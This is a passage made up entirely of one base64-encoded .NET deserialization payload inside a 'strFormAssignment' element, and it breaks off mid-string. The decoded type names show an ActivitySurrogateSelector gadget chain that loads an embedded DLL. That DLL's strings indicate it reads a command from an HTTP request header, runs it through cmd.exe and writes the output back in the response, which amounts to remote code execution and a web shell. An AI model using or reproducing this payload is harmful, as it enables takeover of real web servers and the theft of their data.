<strFormAssignment>AAEAAAD/AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rp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NzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5z